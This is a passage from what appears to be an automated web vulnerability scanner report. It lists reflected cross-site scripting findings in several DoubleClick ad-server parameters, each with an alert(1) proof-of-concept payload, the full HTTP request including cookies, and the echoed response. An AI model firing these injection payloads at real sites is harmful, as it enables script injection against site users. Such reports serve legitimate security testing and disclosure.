Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:45 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-749415602701834233607"-alert(1)-"8c4e642dafd&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195c6"-alert(1)-"651f8671dd0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1195c6"-alert(1)-"651f8671dd0&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1195c6"-alert(1)-"651f8671dd0&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl =
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0be"-alert(1)-"9c6f6bd22dd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQbf0be"-alert(1)-"9c6f6bd22dd&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:35 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQbf0be"-alert(1)-"9c6f6bd22dd&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19d1b"-alert(1)-"fc80ffc9911 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L19d1b"-alert(1)-"fc80ffc9911&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/18e/%2a/r%3B242168639%3B0-0%3B0%3B64929701%3B4307-300/250%3B42471810/42489597/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L19d1b"-alert(1)-"fc80ffc9911&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIF
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_a parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17d8f'-alert(1)-'1694ab6b6d6 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=1812104017d8f'-alert(1)-'1694ab6b6d6&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4886
Date: Mon, 13 Jun 2011 11:03:07 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
10hairy_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=1812104017d8f'-alert(1)-'1694ab6b6d6&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dhairyguy%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79164'-alert(1)-'4c19bc69a73 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=1812363679164'-alert(1)-'4c19bc69a73&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4869
Date: Mon, 13 Jun 2011 11:03:26 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
g';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=1812363679164'-alert(1)-'4c19bc69a73&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dreach%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%
...[SNIP]...

4.19. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_eo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e42d1'-alert(1)-'93e759a580b was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787e42d1'-alert(1)-'93e759a580b&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4869
Date: Mon, 13 Jun 2011 11:02:46 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
p://s0.2mdn.net/1887566/dec10reach_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787e42d1'-alert(1)-'93e759a580b&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dreach%26CTMedia%3Dx1%26CTProgType%3Dmplus
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_et parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7df87'-alert(1)-'6dd69a55840 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=13079628927df87'-alert(1)-'6dd69a55840&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4896
Date: Mon, 13 Jun 2011 11:02:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
.net/1887566/frugal_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=13079628927df87'-alert(1)-'6dd69a55840&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dfrugalmonster%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTU
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca70'-alert(1)-'050bea894a2 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607dca70'-alert(1)-'050bea894a2&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
